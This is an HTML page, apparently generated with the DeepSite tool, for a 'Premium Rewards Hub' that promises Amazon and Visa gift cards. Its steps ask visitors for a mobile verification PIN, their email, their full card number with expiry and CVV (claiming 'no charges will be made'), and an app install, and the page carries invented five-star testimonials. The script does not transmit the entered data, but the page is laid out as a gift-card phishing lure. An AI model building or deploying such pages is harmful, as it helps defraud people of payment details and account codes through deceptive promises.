File size: 24,824 Bytes
e2138a8 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Premium Rewards Hub</title>
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700&display=swap');
body {
font-family: 'Poppins', sans-serif;
background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
min-height: 100vh;
}
.card {
backdrop-filter: blur(16px) saturate(180%);
-webkit-backdrop-filter: blur(16px) saturate(180%);
background-color: rgba(255, 255, 255, 0.85);
border-radius: 12px;
border: 1px solid rgba(209, 213, 219, 0.3);
box-shadow: 0 20px 30px -15px rgba(0, 0, 0, 0.1);
transition: all 0.3s ease;
}
.card:hover {
transform: translateY(-5px);
box-shadow: 0 25px 40px -15px rgba(0, 0, 0, 0.15);
}
.progress-step {
width: 40px;
height: 40px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 50%;
background: #e0e0e0;
color: #666;
font-weight: 600;
position: relative;
}
.progress-step.active {
background: #4f46e5;
color: white;
}
.progress-step.completed {
background: #10b981;
color: white;
}
.progress-step:not(:last-child):after {
content: '';
position: absolute;
width: 60px;
height: 2px;
background: #e0e0e0;
left: 100%;
}
.progress-step.active:not(:last-child):after {
background: #4f46e5;
}
.progress-step.completed:not(:last-child):after {
background: #10b981;
}
.offer-card {
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
color: white;
border-radius: 12px;
overflow: hidden;
}
.input-field {
transition: all 0.3s ease;
border: 1px solid #e2e8f0;
}
.input-field:focus {
border-color: #4f46e5;
box-shadow: 0 0 0 3px rgba(79, 70, 229, 0.2);
}
.btn-primary {
background: linear-gradient(to right, #4f46e5, #7c3aed);
transition: all 0.3s ease;
}
.btn-primary:hover {
transform: translateY(-2px);
box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
}
.btn-secondary {
background: linear-gradient(to right, #10b981, #34d399);
transition: all 0.3s ease;
}
.btn-secondary:hover {
transform: translateY(-2px);
box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
}
@media (max-width: 768px) {
.progress-step:not(:last-child):after {
width: 30px;
}
}
</style>
</head>
<body class="py-8 px-4">
<div class="max-w-4xl mx-auto">
<!-- Header -->
<header class="text-center mb-8">
<h1 class="text-3xl md:text-4xl font-bold text-gray-800 mb-2">Premium Rewards Hub</h1>
<p class="text-gray-600">Complete simple offers to unlock exclusive rewards</p>
</header>
<!-- Progress Steps -->
<div class="flex justify-center mb-10">
<div class="flex items-center">
<div id="step1" class="progress-step active">
<span>1</span>
</div>
<div id="step2" class="progress-step">
<span>2</span>
</div>
<div id="step3" class="progress-step">
<span>3</span>
</div>
<div id="step4" class="progress-step">
<span>4</span>
</div>
</div>
</div>
<!-- Main Content -->
<div class="card p-6 mb-8">
<!-- Step 1: Offer Selection -->
<div id="offerSelection" class="step-content">
<h2 class="text-2xl font-semibold text-gray-800 mb-6">Select Your Reward</h2>
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
<div class="offer-card p-6 cursor-pointer" onclick="selectOffer('amazon')">
<div class="flex items-center mb-4">
<div class="bg-white p-2 rounded-lg mr-4">
<img src="https://logo.clearbit.com/amazon.com" alt="Amazon" class="h-10">
</div>
<div>
<h3 class="font-bold text-lg">Amazon Gift Card</h3>
<p class="text-sm opacity-80">$50 Value</p>
</div>
</div>
<div class="flex justify-between items-center">
<span class="text-sm">Complete 1 offer</span>
<span class="bg-white text-indigo-600 px-3 py-1 rounded-full text-xs font-bold">Popular</span>
</div>
</div>
<div class="offer-card p-6 cursor-pointer" onclick="selectOffer('visa')" style="background: linear-gradient(135deg, #00c6ff 0%, #0072ff 100%);">
<div class="flex items-center mb-4">
<div class="bg-white p-2 rounded-lg mr-4">
<img src="https://logo.clearbit.com/visa.com" alt="Visa" class="h-10">
</div>
<div>
<h3 class="font-bold text-lg">Visa Gift Card</h3>
<p class="text-sm opacity-80">$25 Value</p>
</div>
</div>
<div class="flex justify-between items-center">
<span class="text-sm">Complete 1 offer</span>
<span class="bg-white text-blue-600 px-3 py-1 rounded-full text-xs font-bold">Limited</span>
</div>
</div>
</div>
<div class="mt-8 text-center">
<button onclick="nextStep()" class="btn-primary text-white px-6 py-3 rounded-lg font-medium">
Continue <i class="fas fa-arrow-right ml-2"></i>
</button>
</div>
</div>
<!-- Step 2: PIN Verification -->
<div id="pinVerification" class="step-content hidden">
<h2 class="text-2xl font-semibold text-gray-800 mb-6">Verify Your Account</h2>
<p class="text-gray-600 mb-6">Enter the 4-digit PIN sent to your mobile number to verify your account.</p>
<div class="max-w-md mx-auto">
<div class="mb-6">
<label class="block text-gray-700 mb-2">4-Digit PIN</label>
<div class="flex space-x-4">
<input type="text" maxlength="1" class="input-field w-16 h-16 text-center text-2xl rounded-lg border focus:outline-none" oninput="moveToNext(this, 'pin2')">
<input type="text" maxlength="1" id="pin2" class="input-field w-16 h-16 text-center text-2xl rounded-lg border focus:outline-none" oninput="moveToNext(this, 'pin3')">
<input type="text" maxlength="1" id="pin3" class="input-field w-16 h-16 text-center text-2xl rounded-lg border focus:outline-none" oninput="moveToNext(this, 'pin4')">
<input type="text" maxlength="1" id="pin4" class="input-field w-16 h-16 text-center text-2xl rounded-lg border focus:outline-none">
</div>
</div>
<div class="flex justify-between mt-8">
<button onclick="prevStep()" class="text-gray-600 px-4 py-2 rounded-lg font-medium">
<i class="fas fa-arrow-left mr-2"></i> Back
</button>
<button onclick="nextStep()" class="btn-primary text-white px-6 py-3 rounded-lg font-medium">
Verify <i class="fas fa-check ml-2"></i>
</button>
</div>
</div>
</div>
<!-- Step 3: Email Submission -->
<div id="emailSubmission" class="step-content hidden">
<h2 class="text-2xl font-semibold text-gray-800 mb-6">Email Verification</h2>
<p class="text-gray-600 mb-6">Please enter your email address to receive your reward confirmation.</p>
<div class="max-w-md mx-auto">
<div class="mb-6">
<label class="block text-gray-700 mb-2">Email Address</label>
<input type="email" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="your@email.com">
</div>
<div class="mb-6">
<label class="block text-gray-700 mb-2">Confirm Email Address</label>
<input type="email" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="your@email.com">
</div>
<div class="flex justify-between mt-8">
<button onclick="prevStep()" class="text-gray-600 px-4 py-2 rounded-lg font-medium">
<i class="fas fa-arrow-left mr-2"></i> Back
</button>
<button onclick="nextStep()" class="btn-primary text-white px-6 py-3 rounded-lg font-medium">
Continue <i class="fas fa-arrow-right ml-2"></i>
</button>
</div>
</div>
</div>
<!-- Step 4: Credit Card Submission -->
<div id="creditCardSubmission" class="step-content hidden">
<h2 class="text-2xl font-semibold text-gray-800 mb-6">Payment Verification</h2>
<p class="text-gray-600 mb-6">Enter your payment details to complete the offer (no charges will be made).</p>
<div class="max-w-md mx-auto">
<div class="mb-6">
<label class="block text-gray-700 mb-2">Card Number</label>
<input type="text" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="1234 5678 9012 3456">
</div>
<div class="grid grid-cols-2 gap-4 mb-6">
<div>
<label class="block text-gray-700 mb-2">Expiry Date</label>
<input type="text" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="MM/YY">
</div>
<div>
<label class="block text-gray-700 mb-2">CVV</label>
<input type="text" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="123">
</div>
</div>
<div class="mb-6">
<label class="block text-gray-700 mb-2">Name on Card</label>
<input type="text" class="input-field w-full px-4 py-3 rounded-lg border focus:outline-none" placeholder="John Doe">
</div>
<div class="flex justify-between mt-8">
<button onclick="prevStep()" class="text-gray-600 px-4 py-2 rounded-lg font-medium">
<i class="fas fa-arrow-left mr-2"></i> Back
</button>
<button onclick="nextStep()" class="btn-primary text-white px-6 py-3 rounded-lg font-medium">
Continue <i class="fas fa-arrow-right ml-2"></i>
</button>
</div>
</div>
</div>
<!-- Step 5: Mobile App Install -->
<div id="mobileAppInstall" class="step-content hidden">
<h2 class="text-2xl font-semibold text-gray-800 mb-6">Final Step: Mobile App</h2>
<p class="text-gray-600 mb-6">Install our mobile app to complete the offer and receive your reward.</p>
<div class="max-w-md mx-auto">
<div class="bg-gray-100 p-6 rounded-lg mb-6">
<div class="flex items-center mb-4">
<div class="bg-white p-3 rounded-full mr-4">
<i class="fas fa-mobile-alt text-indigo-600 text-2xl"></i>
</div>
<div>
<h3 class="font-bold">Rewards App</h3>
<p class="text-sm text-gray-600">Install size: 15MB</p>
</div>
</div>
<div class="flex justify-center mb-4">
<img src="https://via.placeholder.com/150" alt="QR Code" class="w-32 h-32">
</div>
<p class="text-center text-sm text-gray-600 mb-4">Scan the QR code or click the button below</p>
<button class="btn-secondary text-white w-full py-3 rounded-lg font-medium">
Install App <i class="fas fa-download ml-2"></i>
</button>
</div>
<div class="flex justify-between mt-8">
<button onclick="prevStep()" class="text-gray-600 px-4 py-2 rounded-lg font-medium">
<i class="fas fa-arrow-left mr-2"></i> Back
</button>
<button onclick="completeOffer()" class="btn-primary text-white px-6 py-3 rounded-lg font-medium">
Complete Offer <i class="fas fa-check ml-2"></i>
</button>
</div>
</div>
</div>
<!-- Completion Screen -->
<div id="completionScreen" class="step-content hidden text-center py-12">
<div class="mb-6">
<div class="w-20 h-20 bg-green-100 rounded-full flex items-center justify-center mx-auto mb-4">
<i class="fas fa-check-circle text-green-500 text-4xl"></i>
</div>
<h2 class="text-2xl font-semibold text-gray-800 mb-2">Offer Completed!</h2>
<p class="text-gray-600 mb-6">Your reward will be delivered to your email within 24 hours.</p>
</div>
<div class="max-w-md mx-auto bg-indigo-50 p-6 rounded-lg mb-8">
<h3 class="font-bold text-indigo-700 mb-2">Your Reward</h3>
<p class="text-gray-800 mb-4" id="selectedRewardText">Amazon $50 Gift Card</p>
<p class="text-sm text-gray-600">Check your email for the redemption code</p>
</div>
<button onclick="restartFlow()" class="btn-secondary text-white px-6 py-3 rounded-lg font-medium">
Claim Another Reward <i class="fas fa-gift ml-2"></i>
</button>
</div>
</div>
<!-- Testimonials -->
<div class="grid grid-cols-1 md:grid-cols-3 gap-6 mb-8">
<div class="card p-6">
<div class="flex items-center mb-4">
<div class="w-10 h-10 rounded-full bg-indigo-100 flex items-center justify-center mr-3">
<i class="fas fa-user text-indigo-600"></i>
</div>
<div>
<h4 class="font-semibold">Sarah J.</h4>
<div class="flex text-yellow-400 text-sm">
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
</div>
</div>
</div>
<p class="text-gray-600">"Got my Amazon gift card in just 2 hours after completing the offer. Super easy!"</p>
</div>
<div class="card p-6">
<div class="flex items-center mb-4">
<div class="w-10 h-10 rounded-full bg-indigo-100 flex items-center justify-center mr-3">
<i class="fas fa-user text-indigo-600"></i>
</div>
<div>
<h4 class="font-semibold">Michael T.</h4>
<div class="flex text-yellow-400 text-sm">
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
</div>
</div>
</div>
<p class="text-gray-600">"The app install was quick and I received my Visa card code the next day."</p>
</div>
<div class="card p-6">
<div class="flex items-center mb-4">
<div class="w-10 h-10 rounded-full bg-indigo-100 flex items-center justify-center mr-3">
<i class="fas fa-user text-indigo-600"></i>
</div>
<div>
<h4 class="font-semibold">Emma L.</h4>
<div class="flex text-yellow-400 text-sm">
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star"></i>
<i class="fas fa-star-half-alt"></i>
</div>
</div>
</div>
<p class="text-gray-600">"Simple process and legit rewards. Will definitely use again for more gift cards."</p>
</div>
</div>
<!-- Footer -->
<footer class="text-center text-gray-600 text-sm">
<div class="mb-4">
<a href="#" class="mx-2 hover:text-indigo-600">Terms of Service</a>
<a href="#" class="mx-2 hover:text-indigo-600">Privacy Policy</a>
<a href="#" class="mx-2 hover:text-indigo-600">Contact Us</a>
</div>
<p>© 2023 Premium Rewards Hub. All rights reserved.</p>
</footer>
</div>
<script>
let currentStep = 1;
let selectedOffer = null;
function selectOffer(offer) {
selectedOffer = offer;
document.querySelectorAll('.offer-card').forEach(card => {
card.style.transform = 'scale(1)';
card.style.border = 'none';
});
event.currentTarget.style.transform = 'scale(1.02)';
event.currentTarget.style.border = '2px solid #4f46e5';
}
function nextStep() {
if (currentStep === 1 && !selectedOffer) {
alert('Please select an offer first');
return;
}
document.getElementById(`step${currentStep}`).classList.remove('active');
document.getElementById(`step${currentStep}`).classList.add('completed');
document.querySelector(`.step-content:nth-child(${currentStep + 1})`).classList.add('hidden');
currentStep++;
if (currentStep > 4) {
document.getElementById('completionScreen').classList.remove('hidden');
document.getElementById('selectedRewardText').textContent =
selectedOffer === 'amazon' ? 'Amazon $50 Gift Card' : 'Visa $25 Gift Card';
} else {
document.getElementById(`step${currentStep}`).classList.add('active');
document.querySelector(`.step-content:nth-child(${currentStep + 1})`).classList.remove('hidden');
}
}
function prevStep() {
document.getElementById(`step${currentStep}`).classList.remove('active');
document.querySelector(`.step-content:nth-child(${currentStep + 1})`).classList.add('hidden');
currentStep--;
document.getElementById(`step${currentStep + 1}`).classList.remove('completed');
document.getElementById(`step${currentStep}`).classList.add('active');
document.querySelector(`.step-content:nth-child(${currentStep + 1})`).classList.remove('hidden');
}
function completeOffer() {
document.getElementById(`step${currentStep}`).classList.remove('active');
document.getElementById(`step${currentStep}`).classList.add('completed');
document.querySelector(`.step-content:nth-child(${currentStep + 1})`).classList.add('hidden');
document.getElementById('completionScreen').classList.remove('hidden');
document.getElementById('selectedRewardText').textContent =
selectedOffer === 'amazon' ? 'Amazon $50 Gift Card' : 'Visa $25 Gift Card';
}
function restartFlow() {
currentStep = 1;
selectedOffer = null;
// Reset all steps
for (let i = 1; i <= 4; i++) {
document.getElementById(`step${i}`).classList.remove('active', 'completed');
document.querySelector(`.step-content:nth-child(${i + 1})`).classList.add('hidden');
}
document.getElementById('step1').classList.add('active');
document.querySelector('.step-content:nth-child(2)').classList.remove('hidden');
document.getElementById('completionScreen').classList.add('hidden');
// Reset offer selection
document.querySelectorAll('.offer-card').forEach(card => {
card.style.transform = 'scale(1)';
card.style.border = 'none';
});
}
function moveToNext(current, nextFieldId) {
if (current.value.length === 1) {
document.getElementById(nextFieldId).focus();
}
}
// Initialize the first step as active
document.addEventListener('DOMContentLoaded', function() {
document.getElementById('step1').classList.add('active');
});
</script>
<p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - <a href="https://enzostvs-deepsite.hf.space?remix=Binajex/bina" style="color: #fff;text-decoration: underline;" target="_blank" >🧬 Remix</a></p></body>
</html> |